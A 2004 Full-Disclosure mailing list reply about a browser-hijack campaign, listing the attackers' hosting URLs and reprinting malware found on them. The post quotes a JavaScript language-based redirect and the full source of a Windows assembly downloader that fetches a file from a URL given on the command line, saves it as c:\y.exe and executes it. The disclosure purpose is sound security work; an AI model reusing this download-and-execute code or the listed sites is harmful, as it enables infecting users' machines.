
Re: [Full-Disclosure] browser hijack by apache sites
On 24-mei-04, at 14:46, Feher Tamas wrote:


http://www.b00gle.com/fa/?d=get

good thing the internet has a memory :)
http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/tool.html+&hl=en



http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the same files, as if copied in a for loop


I especially liked 2 files in the dir; counter.htm containing the extremely funny
<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>
but then I saw this: http://www.pizdato.biz/acc10/2DimensionOfExploits.asm
Hehehe, Open Source is getting big! Didn't see no GPL licence so I hope I'm not violating someone's copyright by posting this here....


.386

.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc

includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

        szLibrary db "urlmon.dll",0
        szFunction db "URLDownloadToFileA",0

szFileName db "c:\y.exe", 0

.code
start:

invoke GetCommandLineA

        add     ax,     0Ah
        lea     ecx,    [eax]
        push    ecx

        invoke LoadLibrary, addr szLibrary
        invoke GetProcAddress, eax, addr szFunction

        pop     ecx
        push    0
        push    0
        lea     ebx,    [szFileName]
        push    ebx
        push    ecx
        push    0
        call    eax

        invoke WinExec, addr szFileName, 1
        invoke ExitProcess, NULL

end start



Yet I do feel a bit suspicious about this set of files... bit TOO educating I think ;)

cheers!

thijs
--

If I had 6 hours to chop down a tree, I'd spend the first four sharpening the axe.
-- Abraham Lincoln


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html